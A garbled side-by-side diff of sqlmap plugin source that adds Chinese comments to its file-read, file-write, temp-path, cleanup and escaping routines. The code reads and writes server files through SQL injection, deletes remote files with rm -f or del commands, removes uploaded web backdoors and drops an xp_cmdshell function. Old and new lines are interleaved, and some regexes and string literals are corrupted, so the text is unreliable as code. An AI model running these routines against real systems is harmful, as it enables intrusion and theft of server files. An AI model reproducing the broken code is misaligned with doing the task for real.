def askCheckWrittenFile(self, localFile, remoteFile, forceCheck=False): def askCheckWrittenFile(self, localFile, remoteFile, forceCheck=False):
choice = None """
询问用户是否需要检查写入的文件
Args:
localFile (str): 本地文件路径
remoteFile (str): 远程文件路径
forceCheck (bool, optional): 是否强制检查. Defaults to False.
Returns:
bool: 如果文件写入成功返回 True如果用户选择不检查返回 True否则返回 False
"""
choice = None # 初始化用户选择
if forceCheck is not True: if forceCheck is not True:
message = "do you want confirmation that the local file '%s' " % localFile # 如果不强制检查
message += "has been successfully written on the back-end DBMS " message = "do you want confirmation that the local file '%s' " % localFile # 构造询问消息
message += "file system ('%s')? [Y/n] " % remoteFile message += "has been successfully written on the back-end DBMS " # 消息补充
choice = readInput(message, default='Y', boolean=True) message += "file system ('%s')? [Y/n] " % remoteFile # 消息补充
choice = readInput(message, default='Y', boolean=True) # 读取用户输入
if forceCheck or choice: if forceCheck or choice:
return self._checkFileLength(localFile, remoteFile) # 如果强制检查或者用户选择检查
return self._checkFileLength(localFile, remoteFile) # 调用检查文件长度函数
return True return True # 如果用户选择不检查,则返回 True
def askCheckReadFile(self, localFile, remoteFile): def askCheckReadFile(self, localFile, remoteFile):
"""
询问用户是否需要检查读取的文件
Args:
localFile (str): 本地文件路径
remoteFile (str): 远程文件路径
Returns:
bool: 如果文件读取成功返回 True如果用户选择不检查返回 None
"""
if not kb.bruteMode: if not kb.bruteMode:
message = "do you want confirmation that the remote file '%s' " % remoteFile # 如果不是爆破模式
message += "has been successfully downloaded from the back-end " message = "do you want confirmation that the remote file '%s' " % remoteFile # 构造询问消息
message += "DBMS file system? [Y/n] " message += "has been successfully downloaded from the back-end " # 消息补充
message += "DBMS file system? [Y/n] " # 消息补充
if readInput(message, default='Y', boolean=True): if readInput(message, default='Y', boolean=True):
return self._checkFileLength(localFile, remoteFile, True) # 读取用户输入
return self._checkFileLength(localFile, remoteFile, True) # 如果用户选择检查,调用检查文件长度函数
return None return None # 如果用户选择不检查,则返回 None
def nonStackedReadFile(self, remoteFile): def nonStackedReadFile(self, remoteFile):
errMsg = "'nonStackedReadFile' method must be defined " """
errMsg += "into the specific DBMS plugin" 使用非堆叠查询技术读取远程文件需要在子类中实现
raise SqlmapUndefinedMethod(errMsg)
Args:
remoteFile (str): 远程文件路径
Raises:
SqlmapUndefinedMethod: 如果没有在子类中实现该方法则抛出该异常
"""
errMsg = "'nonStackedReadFile' method must be defined " # 构造错误消息
errMsg += "into the specific DBMS plugin" # 错误消息补充
raise SqlmapUndefinedMethod(errMsg) # 抛出 SqlmapUndefinedMethod 异常
def stackedReadFile(self, remoteFile): def stackedReadFile(self, remoteFile):
errMsg = "'stackedReadFile' method must be defined " """
errMsg += "into the specific DBMS plugin" 使用堆叠查询技术读取远程文件需要在子类中实现
raise SqlmapUndefinedMethod(errMsg)
Args:
remoteFile (str): 远程文件路径
Raises:
SqlmapUndefinedMethod: 如果没有在子类中实现该方法则抛出该异常
"""
errMsg = "'stackedReadFile' method must be defined " # 构造错误消息
errMsg += "into the specific DBMS plugin" # 错误消息补充
raise SqlmapUndefinedMethod(errMsg) # 抛出 SqlmapUndefinedMethod 异常
def unionWriteFile(self, localFile, remoteFile, fileType, forceCheck=False): def unionWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
errMsg = "'unionWriteFile' method must be defined " """
errMsg += "into the specific DBMS plugin" 使用 UNION 查询技术写入文件需要在子类中实现
raise SqlmapUndefinedMethod(errMsg)
Args:
localFile (str): 本地文件路径
remoteFile (str): 远程文件路径
fileType (str): 文件类型
forceCheck (bool, optional): 是否强制检查. Defaults to False.
Raises:
SqlmapUndefinedMethod: 如果没有在子类中实现该方法则抛出该异常
"""
errMsg = "'unionWriteFile' method must be defined " # 构造错误消息
errMsg += "into the specific DBMS plugin" # 错误消息补充
raise SqlmapUndefinedMethod(errMsg) # 抛出 SqlmapUndefinedMethod 异常
def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False): def stackedWriteFile(self, localFile, remoteFile, fileType, forceCheck=False):
errMsg = "'stackedWriteFile' method must be defined " """
errMsg += "into the specific DBMS plugin" 使用堆叠查询技术写入文件需要在子类中实现
raise SqlmapUndefinedMethod(errMsg)
Args:
localFile (str): 本地文件路径
remoteFile (str): 远程文件路径
fileType (str): 文件类型
forceCheck (bool, optional): 是否强制检查. Defaults to False.
Raises:
SqlmapUndefinedMethod: 如果没有在子类中实现该方法则抛出该异常
"""
errMsg = "'stackedWriteFile' method must be defined " # 构造错误消息
errMsg += "into the specific DBMS plugin" # 错误消息补充
raise SqlmapUndefinedMethod(errMsg) # 抛出 SqlmapUndefinedMethod 异常
def readFile(self, remoteFile): def readFile(self, remoteFile):
localFilePaths = [] """
读取远程文件
Args:
remoteFile (str): 远程文件路径
Returns:
list: 本地文件路径列表
"""
localFilePaths = [] # 初始化本地文件路径列表
self.checkDbmsOs() self.checkDbmsOs() # 检查数据库类型和操作系统类型
for remoteFile in remoteFile.split(','): for remoteFile in remoteFile.split(','):
fileContent = None # 遍历所有远程文件路径
kb.fileReadMode = True fileContent = None # 初始化文件内容
kb.fileReadMode = True # 设置文件读取模式为 True
if conf.direct or isStackingAvailable(): if conf.direct or isStackingAvailable():
# 如果使用直接连接或支持堆叠查询
if isStackingAvailable(): if isStackingAvailable():
debugMsg = "going to try to read the file with stacked query SQL " # 如果支持堆叠查询
debugMsg += "injection technique" debugMsg = "going to try to read the file with stacked query SQL " # 构造调试消息
logger.debug(debugMsg) debugMsg += "injection technique" # 调试消息补充
logger.debug(debugMsg) # 打印调试消息
fileContent = self.stackedReadFile(remoteFile) fileContent = self.stackedReadFile(remoteFile) # 使用堆叠查询技术读取文件
elif Backend.isDbms(DBMS.MYSQL): elif Backend.isDbms(DBMS.MYSQL):
debugMsg = "going to try to read the file with non-stacked query " # 如果是 MySQL 数据库
debugMsg += "SQL injection technique" debugMsg = "going to try to read the file with non-stacked query " # 构造调试消息
logger.debug(debugMsg) debugMsg += "SQL injection technique" # 调试消息补充
logger.debug(debugMsg) # 打印调试消息
fileContent = self.nonStackedReadFile(remoteFile) fileContent = self.nonStackedReadFile(remoteFile) # 使用非堆叠查询技术读取文件
else: else:
errMsg = "none of the SQL injection techniques detected can " # 如果无法使用以上技术读取文件
errMsg += "be used to read files from the underlying file " errMsg = "none of the SQL injection techniques detected can " # 构造错误消息
errMsg += "system of the back-end %s server" % Backend.getDbms() errMsg += "be used to read files from the underlying file " # 错误消息补充
logger.error(errMsg) errMsg += "system of the back-end %s server" % Backend.getDbms() # 错误消息补充
logger.error(errMsg) # 打印错误消息
fileContent = None fileContent = None # 将文件内容设置为 None
kb.fileReadMode = False kb.fileReadMode = False # 设置文件读取模式为 False
if fileContent in (None, "") and not Backend.isDbms(DBMS.PGSQL): if fileContent in (None, "") and not Backend.isDbms(DBMS.PGSQL):
self.cleanup(onlyFileTbl=True) # 如果文件内容为空并且不是 PostgreSQL 数据库
self.cleanup(onlyFileTbl=True) # 清理文件表
elif isListLike(fileContent): elif isListLike(fileContent):
newFileContent = "" # 如果文件内容是一个列表
newFileContent = "" # 初始化新的文件内容
for chunk in fileContent: for chunk in fileContent:
# 遍历文件内容中的块
if isListLike(chunk): if isListLike(chunk):
# 如果块本身是一个列表
if len(chunk) > 0: if len(chunk) > 0:
chunk = chunk[0] # 如果块列表不为空
chunk = chunk[0] # 获取块列表的第一个元素
else: else:
chunk = "" # 如果块列表为空
chunk = "" # 将块设置为空字符串
if chunk: if chunk:
newFileContent += chunk # 如果块不为空
newFileContent += chunk # 将块添加到新的文件内容中
fileContent = newFileContent fileContent = newFileContent # 将新的文件内容赋值给 fileContent
if fileContent is not None: if fileContent is not None:
fileContent = decodeDbmsHexValue(fileContent, True) # 如果文件内容不为空
fileContent = decodeDbmsHexValue(fileContent, True) # 解码文件内容
if fileContent.strip(): if fileContent.strip():
localFilePath = dataToOutFile(remoteFile, fileContent) # 如果文件内容不为空
localFilePath = dataToOutFile(remoteFile, fileContent) # 将文件内容写入本地文件
if not Backend.isDbms(DBMS.PGSQL): if not Backend.isDbms(DBMS.PGSQL):
self.cleanup(onlyFileTbl=True) # 如果不是 PostgreSQL 数据库
self.cleanup(onlyFileTbl=True) # 清理文件表
sameFile = self.askCheckReadFile(localFilePath, remoteFile) sameFile = self.askCheckReadFile(localFilePath, remoteFile) # 询问用户是否需要检查读取的文件
if sameFile is True: if sameFile is True:
localFilePath += " (same file)" # 如果文件相同
localFilePath += " (same file)" # 添加 (same file) 后缀
elif sameFile is False: elif sameFile is False:
localFilePath += " (size differs from remote file)" # 如果文件大小不同
localFilePath += " (size differs from remote file)" # 添加 (size differs from remote file) 后缀
localFilePaths.append(localFilePath) localFilePaths.append(localFilePath) # 将本地文件路径添加到列表中
elif not kb.bruteMode: elif not kb.bruteMode:
errMsg = "no data retrieved" # 如果文件内容为空并且不是爆破模式
logger.error(errMsg) errMsg = "no data retrieved" # 构造错误消息
logger.error(errMsg) # 打印错误消息
return localFilePaths return localFilePaths # 返回本地文件路径列表
def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False): def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False):
written = False """
写入本地文件到远程服务器
Args:
localFile (str): 本地文件路径
remoteFile (str): 远程文件路径
fileType (str, optional): 文件类型. Defaults to None.
forceCheck (bool, optional): 是否强制检查文件长度. Defaults to False.
Returns:
bool: 如果文件写入成功则返回 True否则返回 False
"""
written = False # 初始化写入状态
checkFile(localFile) checkFile(localFile) # 检查本地文件是否存在
self.checkDbmsOs() self.checkDbmsOs() # 检查数据库类型和操作系统类型
if localFile.endswith('_'): if localFile.endswith('_'):
localFile = getUnicode(decloakToTemp(localFile)) # 如果本地文件名以 '_' 结尾
localFile = getUnicode(decloakToTemp(localFile)) # 将伪装的文件名转换为临时文件路径
if conf.direct or isStackingAvailable(): if conf.direct or isStackingAvailable():
# 如果使用直接连接或者支持堆叠查询技术
if isStackingAvailable(): if isStackingAvailable():
debugMsg = "going to upload the file '%s' with " % fileType # 如果支持堆叠查询技术
debugMsg += "stacked query technique" debugMsg = "going to upload the file '%s' with " % fileType # 构造调试消息
logger.debug(debugMsg) debugMsg += "stacked query technique" # 调试消息补充
logger.debug(debugMsg) # 打印调试信息
written = self.stackedWriteFile(localFile, remoteFile, fileType, forceCheck) written = self.stackedWriteFile(localFile, remoteFile, fileType, forceCheck) # 使用堆叠查询技术写入文件
self.cleanup(onlyFileTbl=True) self.cleanup(onlyFileTbl=True) # 清理临时表
elif isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and Backend.isDbms(DBMS.MYSQL): elif isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and Backend.isDbms(DBMS.MYSQL):
debugMsg = "going to upload the file '%s' with " % fileType # 如果支持 UNION 查询技术并且是 MySQL 数据库
debugMsg += "UNION query technique" debugMsg = "going to upload the file '%s' with " % fileType # 构造调试信息
logger.debug(debugMsg) debugMsg += "UNION query technique" # 调试消息补充
logger.debug(debugMsg) # 打印调试信息
written = self.unionWriteFile(localFile, remoteFile, fileType, forceCheck) written = self.unionWriteFile(localFile, remoteFile, fileType, forceCheck) # 使用 UNION 查询技术写入文件
elif Backend.isDbms(DBMS.MYSQL): elif Backend.isDbms(DBMS.MYSQL):
debugMsg = "going to upload the file '%s' with " % fileType # 如果是 MySQL 数据库
debugMsg += "LINES TERMINATED BY technique" debugMsg = "going to upload the file '%s' with " % fileType # 构造调试信息
logger.debug(debugMsg) debugMsg += "LINES TERMINATED BY technique" # 调试消息补充
logger.debug(debugMsg) # 打印调试信息
written = self.linesTerminatedWriteFile(localFile, remoteFile, fileType, forceCheck) written = self.linesTerminatedWriteFile(localFile, remoteFile, fileType, forceCheck) # 使用 LINES TERMINATED BY 技术写入文件
else: else:
errMsg = "none of the SQL injection techniques detected can " # 如果以上技术都无法使用
errMsg += "be used to write files to the underlying file " errMsg = "none of the SQL injection techniques detected can " # 构造错误消息
errMsg += "system of the back-end %s server" % Backend.getDbms() errMsg += "be used to write files to the underlying file " # 错误消息补充
logger.error(errMsg) errMsg += "system of the back-end %s server" % Backend.getDbms() # 错误消息补充
logger.error(errMsg) # 打印错误消息
return None return None # 返回 None
return written return written # 返回写入状态

@ -5,200 +5,211 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission See the file 'LICENSE' for copying permission
""" """
import ntpath # 导入必要的模块
import re import ntpath # 导入 ntpath 模块,用于处理 Windows 路径
import re # 导入 re 模块,用于正则表达式
from lib.core.common import Backend
from lib.core.common import hashDBWrite from lib.core.common import Backend # 导入 Backend 类,用于访问后端数据库信息
from lib.core.common import isStackingAvailable from lib.core.common import hashDBWrite # 导入 hashDBWrite 函数,用于写入哈希数据库
from lib.core.common import normalizePath from lib.core.common import isStackingAvailable # 导入 isStackingAvailable 函数,用于检查是否支持堆叠查询
from lib.core.common import ntToPosixSlashes from lib.core.common import normalizePath # 导入 normalizePath 函数,用于规范化路径
from lib.core.common import posixToNtSlashes from lib.core.common import ntToPosixSlashes # 导入 ntToPosixSlashes 函数,用于将 Windows 路径转换为 POSIX 路径
from lib.core.common import readInput from lib.core.common import posixToNtSlashes # 导入 posixToNtSlashes 函数,用于将 POSIX 路径转换为 Windows 路径
from lib.core.common import singleTimeDebugMessage from lib.core.common import readInput # 导入 readInput 函数,用于读取用户输入
from lib.core.common import unArrayizeValue from lib.core.common import singleTimeDebugMessage # 导入 singleTimeDebugMessage 函数,用于输出单次调试信息
from lib.core.data import conf from lib.core.common import unArrayizeValue # 导入 unArrayizeValue 函数,用于将数组值转换为单个值
from lib.core.data import kb from lib.core.data import conf # 导入 conf 对象,用于访问全局配置信息
from lib.core.data import logger from lib.core.data import kb # 导入 kb 对象,用于访问全局知识库
from lib.core.data import queries from lib.core.data import logger # 导入 logger 对象,用于输出日志
from lib.core.enums import DBMS from lib.core.data import queries # 导入 queries 字典,存储数据库查询语句
from lib.core.enums import HASHDB_KEYS from lib.core.enums import DBMS # 导入 DBMS 枚举,定义数据库管理系统类型
from lib.core.enums import OS from lib.core.enums import HASHDB_KEYS # 导入 HASHDB_KEYS 枚举,定义哈希数据库键值
from lib.core.exception import SqlmapNoneDataException from lib.core.enums import OS # 导入 OS 枚举,定义操作系统类型
from lib.request import inject from lib.core.exception import SqlmapNoneDataException # 导入 SqlmapNoneDataException 异常类
from lib.request import inject # 导入 inject 函数,用于执行 SQL 注入请求
# 定义 Miscellaneous 类,用于实现杂项功能
class Miscellaneous(object): class Miscellaneous(object):
""" """
This class defines miscellaneous functionalities for plugins. This class defines miscellaneous functionalities for plugins.
""" """
# 初始化 Miscellaneous 类
def __init__(self): def __init__(self):
pass pass
# 定义 getRemoteTempPath 方法,用于获取远程临时路径
def getRemoteTempPath(self): def getRemoteTempPath(self):
if not conf.tmpPath and Backend.isDbms(DBMS.MSSQL): if not conf.tmpPath and Backend.isDbms(DBMS.MSSQL): # 如果没有设置临时路径且数据库是 MSSQL
debugMsg = "identifying Microsoft SQL Server error log directory " debugMsg = "identifying Microsoft SQL Server error log directory " # 输出调试信息
debugMsg += "that sqlmap will use to store temporary files with " debugMsg += "that sqlmap will use to store temporary files with "
debugMsg += "commands' output" debugMsg += "commands' output"
logger.debug(debugMsg) logger.debug(debugMsg)
_ = unArrayizeValue(inject.getValue("SELECT SERVERPROPERTY('ErrorLogFileName')", safeCharEncode=False)) _ = unArrayizeValue(inject.getValue("SELECT SERVERPROPERTY('ErrorLogFileName')", safeCharEncode=False)) # 获取错误日志文件路径
if _: if _: # 如果获取到路径
conf.tmpPath = ntpath.dirname(_) conf.tmpPath = ntpath.dirname(_) # 设置临时路径为错误日志文件所在的目录
if not conf.tmpPath: if not conf.tmpPath: # 如果没有设置临时路径
if Backend.isOs(OS.WINDOWS): if Backend.isOs(OS.WINDOWS): # 如果操作系统是 Windows
if conf.direct: if conf.direct: # 如果是直接连接
conf.tmpPath = "%TEMP%" conf.tmpPath = "%TEMP%" # 设置临时路径为 %TEMP%
else: else:
self.checkDbmsOs(detailed=True) self.checkDbmsOs(detailed=True) # 检测数据库操作系统
if Backend.getOsVersion() in ("2000", "NT"): if Backend.getOsVersion() in ("2000", "NT"): # 如果是 Windows 2000 或 NT
conf.tmpPath = "C:/WINNT/Temp" conf.tmpPath = "C:/WINNT/Temp" # 设置临时路径
elif Backend.isOs("XP"): elif Backend.isOs("XP"): # 如果是 Windows XP
conf.tmpPath = "C:/Documents and Settings/All Users/Application Data/Temp" conf.tmpPath = "C:/Documents and Settings/All Users/Application Data/Temp" # 设置临时路径
else: else: # 如果是其他 Windows 版本
conf.tmpPath = "C:/Windows/Temp" conf.tmpPath = "C:/Windows/Temp" # 设置临时路径
else: else: # 如果操作系统不是 Windows
conf.tmpPath = "/tmp" conf.tmpPath = "/tmp" # 设置临时路径为 /tmp
if re.search(r"\A[\w]:[\/\\]+", conf.tmpPath, re.I): if re.search(r"\A[\w]:[\/\$$+", conf.tmpPath, re.I): # 如果临时路径是 Windows 格式
Backend.setOs(OS.WINDOWS) Backend.setOs(OS.WINDOWS) # 设置操作系统为 Windows
conf.tmpPath = normalizePath(conf.tmpPath) conf.tmpPath = normalizePath(conf.tmpPath) # 规范化临时路径
conf.tmpPath = ntToPosixSlashes(conf.tmpPath) conf.tmpPath = ntToPosixSlashes(conf.tmpPath) # 将临时路径转换为 POSIX 格式
singleTimeDebugMessage("going to use '%s' as temporary files directory" % conf.tmpPath) singleTimeDebugMessage("going to use '%s' as temporary files directory" % conf.tmpPath) # 输出调试信息
hashDBWrite(HASHDB_KEYS.CONF_TMP_PATH, conf.tmpPath) hashDBWrite(HASHDB_KEYS.CONF_TMP_PATH, conf.tmpPath) # 写入哈希数据库
return conf.tmpPath return conf.tmpPath # 返回临时路径
# 定义 getVersionFromBanner 方法,用于从 banner 中获取数据库版本
def getVersionFromBanner(self): def getVersionFromBanner(self):
if "dbmsVersion" in kb.bannerFp: if "dbmsVersion" in kb.bannerFp: # 如果 banner 中已经有版本信息
return return # 直接返回
infoMsg = "detecting back-end DBMS version from its banner" infoMsg = "detecting back-end DBMS version from its banner" # 输出信息
logger.info(infoMsg) logger.info(infoMsg)
query = queries[Backend.getIdentifiedDbms()].banner.query query = queries[Backend.getIdentifiedDbms()].banner.query # 获取 banner 查询语句
if conf.direct: if conf.direct: # 如果是直接连接
query = "SELECT %s" % query query = "SELECT %s" % query # 添加 SELECT 关键字
kb.bannerFp["dbmsVersion"] = unArrayizeValue(inject.getValue(query)) or "" kb.bannerFp["dbmsVersion"] = unArrayizeValue(inject.getValue(query)) or "" # 获取 banner 信息
match = re.search(r"\d[\d.-]*", kb.bannerFp["dbmsVersion"]) match = re.search(r"\d[\d.-]*", kb.bannerFp["dbmsVersion"]) # 使用正则表达式匹配版本号
if match: if match: # 如果匹配成功
kb.bannerFp["dbmsVersion"] = match.group(0) kb.bannerFp["dbmsVersion"] = match.group(0) # 设置版本号
# 定义 delRemoteFile 方法,用于删除远程文件
def delRemoteFile(self, filename): def delRemoteFile(self, filename):
if not filename: if not filename: # 如果文件名为空
return return # 直接返回
self.checkDbmsOs() self.checkDbmsOs() # 检测数据库操作系统
if Backend.isOs(OS.WINDOWS): if Backend.isOs(OS.WINDOWS): # 如果操作系统是 Windows
filename = posixToNtSlashes(filename) filename = posixToNtSlashes(filename) # 将路径转换为 Windows 格式
cmd = "del /F /Q %s" % filename cmd = "del /F /Q %s" % filename # 构建删除命令
else: else: # 如果操作系统不是 Windows
cmd = "rm -f %s" % filename cmd = "rm -f %s" % filename # 构建删除命令
self.execCmd(cmd, silent=True) self.execCmd(cmd, silent=True) # 执行删除命令
# 定义 createSupportTbl 方法,用于创建支持表
def createSupportTbl(self, tblName, tblField, tblType): def createSupportTbl(self, tblName, tblField, tblType):
inject.goStacked("DROP TABLE %s" % tblName, silent=True) inject.goStacked("DROP TABLE %s" % tblName, silent=True) # 删除表(如果存在)
if Backend.isDbms(DBMS.MSSQL) and tblName == self.cmdTblName: if Backend.isDbms(DBMS.MSSQL) and tblName == self.cmdTblName: # 如果是 MSSQL 并且表名是命令表
inject.goStacked("CREATE TABLE %s(id INT PRIMARY KEY IDENTITY, %s %s)" % (tblName, tblField, tblType)) inject.goStacked("CREATE TABLE %s(id INT PRIMARY KEY IDENTITY, %s %s)" % (tblName, tblField, tblType)) # 创建表,包含自增 id
else: else: # 如果不是 MSSQL 或表名不是命令表
inject.goStacked("CREATE TABLE %s(%s %s)" % (tblName, tblField, tblType)) inject.goStacked("CREATE TABLE %s(%s %s)" % (tblName, tblField, tblType)) # 创建表
# 定义 cleanup 方法,用于清理文件系统和数据库
def cleanup(self, onlyFileTbl=False, udfDict=None, web=False): def cleanup(self, onlyFileTbl=False, udfDict=None, web=False):
""" """
Cleanup file system and database from sqlmap create files, tables Cleanup file system and database from sqlmap create files, tables
and functions and functions
""" """
if web and self.webBackdoorFilePath: if web and self.webBackdoorFilePath: # 如果是 web 模式且有 web 后门文件路径
logger.info("cleaning up the web files uploaded") logger.info("cleaning up the web files uploaded") # 输出信息
self.delRemoteFile(self.webStagerFilePath) self.delRemoteFile(self.webStagerFilePath) # 删除 web stager 文件
self.delRemoteFile(self.webBackdoorFilePath) self.delRemoteFile(self.webBackdoorFilePath) # 删除 web 后门文件
if (not isStackingAvailable() or kb.udfFail) and not conf.direct: if (not isStackingAvailable() or kb.udfFail) and not conf.direct: # 如果不支持堆叠查询或 udf失败且不是直接连接
return return # 直接返回
if any((conf.osCmd, conf.osShell)) and Backend.isDbms(DBMS.PGSQL) and kb.copyExecTest: if any((conf.osCmd, conf.osShell)) and Backend.isDbms(DBMS.PGSQL) and kb.copyExecTest: # 如果执行系统命令/shell 且是 PostgreSQL 且 copyExecTest 为 True
return return # 直接返回
if Backend.isOs(OS.WINDOWS): if Backend.isOs(OS.WINDOWS): # 如果操作系统是 Windows
libtype = "dynamic-link library" libtype = "dynamic-link library" # 设置库类型为动态链接库
elif Backend.isOs(OS.LINUX): elif Backend.isOs(OS.LINUX): # 如果操作系统是 Linux
libtype = "shared object" libtype = "shared object" # 设置库类型为共享对象
else: else: # 如果是其他操作系统
libtype = "shared library" libtype = "shared library" # 设置库类型为共享库
if onlyFileTbl: if onlyFileTbl: # 如果只清理文件表
logger.debug("cleaning up the database management system") logger.debug("cleaning up the database management system") # 输出调试信息
else: else: # 如果清理所有
logger.info("cleaning up the database management system") logger.info("cleaning up the database management system") # 输出信息
logger.debug("removing support tables") logger.debug("removing support tables") # 输出调试信息
inject.goStacked("DROP TABLE %s" % self.fileTblName, silent=True) inject.goStacked("DROP TABLE %s" % self.fileTblName, silent=True) # 删除文件表
inject.goStacked("DROP TABLE %shex" % self.fileTblName, silent=True) inject.goStacked("DROP TABLE %shex" % self.fileTblName, silent=True) # 删除文件表 (hex)
if not onlyFileTbl: if not onlyFileTbl: # 如果不是只清理文件表
inject.goStacked("DROP TABLE %s" % self.cmdTblName, silent=True) inject.goStacked("DROP TABLE %s" % self.cmdTblName, silent=True) # 删除命令表
if Backend.isDbms(DBMS.MSSQL): if Backend.isDbms(DBMS.MSSQL): # 如果是 MSSQL
udfDict = {"master..new_xp_cmdshell": {}} udfDict = {"master..new_xp_cmdshell": {}} # 设置要删除的 udf (xp_cmdshell)
if udfDict is None: if udfDict is None: # 如果 udfDict 为空
udfDict = getattr(self, "sysUdfs", {}) udfDict = getattr(self, "sysUdfs", {}) # 获取系统 udf
for udf, inpRet in udfDict.items(): for udf, inpRet in udfDict.items(): # 遍历 udf
message = "do you want to remove UDF '%s'? [Y/n] " % udf message = "do you want to remove UDF '%s'? [Y/n] " % udf # 输出询问信息
if readInput(message, default='Y', boolean=True): if readInput(message, default='Y', boolean=True): # 获取用户输入
dropStr = "DROP FUNCTION %s" % udf dropStr = "DROP FUNCTION %s" % udf # 构建删除 udf 命令
if Backend.isDbms(DBMS.PGSQL): if Backend.isDbms(DBMS.PGSQL): # 如果是 PostgreSQL
inp = ", ".join(i for i in inpRet["input"]) inp = ", ".join(i for i in inpRet["input"]) # 获取输入参数
dropStr += "(%s)" % inp dropStr += "(%s)" % inp # 添加输入参数到删除命令
logger.debug("removing UDF '%s'" % udf) logger.debug("removing UDF '%s'" % udf) # 输出调试信息
inject.goStacked(dropStr, silent=True) inject.goStacked(dropStr, silent=True) # 删除 udf
logger.info("database management system cleanup finished") logger.info("database management system cleanup finished") # 输出信息
warnMsg = "remember that UDF %s files " % libtype warnMsg = "remember that UDF %s files " % libtype # 构建警告信息
if conf.osPwn: if conf.osPwn: # 如果开启 osPwn 功能
warnMsg += "and Metasploit related files in the temporary " warnMsg += "and Metasploit related files in the temporary " # 添加 Metasploit 相关文件信息
warnMsg += "folder " warnMsg += "folder "
warnMsg += "saved on the file system can only be deleted " warnMsg += "saved on the file system can only be deleted " # 添加手动删除信息
warnMsg += "manually" warnMsg += "manually"
logger.warning(warnMsg) logger.warning(warnMsg) # 输出警告信息
# 定义 likeOrExact 方法,用于选择 LIKE 或精确匹配
def likeOrExact(self, what): def likeOrExact(self, what):
message = "do you want sqlmap to consider provided %s(s):\n" % what message = "do you want sqlmap to consider provided %s(s):\
message += "[1] as LIKE %s names (default)\n" % what " % what # 构建询问信息
message += "[1] as LIKE %s names (default)\
" % what
message += "[2] as exact %s names" % what message += "[2] as exact %s names" % what
choice = readInput(message, default='1') choice = readInput(message, default='1') # 获取用户选择
if not choice or choice == '1': if not choice or choice == '1': # 如果选择 LIKE 匹配
choice = '1' choice = '1'
condParam = " LIKE '%%%s%%'" condParam = " LIKE '%%%s%%'" # 设置 LIKE 条件
elif choice == '2': elif choice == '2': # 如果选择精确匹配
condParam = "='%s'" condParam = "='%s'" # 设置精确匹配条件
else: else: # 如果输入非法
errMsg = "invalid value" errMsg = "invalid value" # 输出错误信息
raise SqlmapNoneDataException(errMsg) raise SqlmapNoneDataException(errMsg) # 抛出异常
return choice, condParam return choice, condParam # 返回选择和条件

File diff suppressed because it is too large Load Diff

@ -5,46 +5,71 @@ Copyright (c) 2006-2024 sqlmap developers (https://sqlmap.org/)
See the file 'LICENSE' for copying permission See the file 'LICENSE' for copying permission
""" """
import re import re # 导入re模块用于正则表达式操作
from lib.core.common import Backend from lib.core.common import Backend # 导入Backend类用于获取后端数据库信息
from lib.core.convert import getBytes from lib.core.convert import getBytes # 导入getBytes函数用于将字符串转换为字节
from lib.core.data import conf from lib.core.data import conf # 导入conf对象存储全局配置信息
from lib.core.enums import DBMS from lib.core.enums import DBMS # 导入DBMS枚举类定义数据库类型
from lib.core.exception import SqlmapUndefinedMethod from lib.core.exception import SqlmapUndefinedMethod # 导入SqlmapUndefinedMethod异常类表示未定义的方法
class Syntax(object): class Syntax(object):
""" """
This class defines generic syntax functionalities for plugins. This class defines generic syntax functionalities for plugins.
这个类定义了插件的通用语法功能
""" """
def __init__(self): def __init__(self):
pass pass # 初始化方法,此处为空
@staticmethod @staticmethod
def _escape(expression, quote=True, escaper=None): def _escape(expression, quote=True, escaper=None):
retVal = expression """
Internal method to escape a given expression.
内部方法用于转义给定的表达式
if quote: Args:
for item in re.findall(r"'[^']*'+", expression): expression (str): The expression to escape. 要转义的表达式
original = item[1:-1] quote (bool, optional): Whether to handle quoting. 是否处理引号默认为True
if original: escaper (function, optional): The function to use for escaping. 用于转义的函数默认为None
Returns:
str: 转义后的表达式
"""
retVal = expression # 初始化返回值
if quote: # 如果需要处理引号
for item in re.findall(r"'[^']*'+", expression): # 查找所有单引号包裹的内容
original = item[1:-1] # 获取引号内的原始内容
if original: # 如果原始内容不为空
if Backend.isDbms(DBMS.SQLITE) and "X%s" % item in expression: if Backend.isDbms(DBMS.SQLITE) and "X%s" % item in expression:
continue continue # 如果是SQLite数据库且表达式中包含X'...'的格式,则跳过
if re.search(r"\[(SLEEPTIME|RAND)", original) is None: # e.g. '[SLEEPTIME]' marker if re.search(r"$$(SLEEPTIME|RAND)", original) is None: # 检查原始内容是否包含[SLEEPTIME]或[RAND]标记,例如'[SLEEPTIME]'
replacement = escaper(original) if not conf.noEscape else original replacement = escaper(original) if not conf.noEscape else original # 如果配置中没有设置noEscape则使用转义函数进行转义否则不转义
if replacement != original: if replacement != original: # 如果转义后的内容与原始内容不同
retVal = retVal.replace(item, replacement) retVal = retVal.replace(item, replacement) # 则替换表达式中的原始内容为转义后的内容
elif len(original) != len(getBytes(original)) and "n'%s'" % original not in retVal and Backend.getDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.ORACLE, DBMS.MSSQL): elif len(original) != len(getBytes(original)) and "n'%s'" % original not in retVal and Backend.getDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.ORACLE, DBMS.MSSQL):
retVal = retVal.replace("'%s'" % original, "n'%s'" % original) # 如果原始内容的字节长度与字符串长度不同且不是n'...'格式且数据库为MySQLPostgreSQLOracleMSSQL中的一种
else: retVal = retVal.replace("'%s'" % original, "n'%s'" % original) # 则将表达式中的原始内容替换为n'...'格式以支持Unicode字符
retVal = escaper(expression) else: # 如果不需要处理引号
retVal = escaper(expression) # 使用转义函数进行转义
return retVal return retVal # 返回转义后的表达式
@staticmethod @staticmethod
def escape(expression, quote=True): def escape(expression, quote=True):
"""
Generic method to escape a given expression.
通用方法用于转义给定的表达式
Args:
expression (str): The expression to escape. 要转义的表达式
quote (bool, optional): Whether to handle quoting. 是否处理引号默认为True
Raises:
SqlmapUndefinedMethod: 如果没有在具体数据库插件中定义escape方法则抛出此异常
"""
errMsg = "'escape' method must be defined " errMsg = "'escape' method must be defined "
errMsg += "inside the specific DBMS plugin" errMsg += "inside the specific DBMS plugin"
raise SqlmapUndefinedMethod(errMsg) raise SqlmapUndefinedMethod(errMsg) # 抛出异常表示未在具体DBMS插件中定义此方法

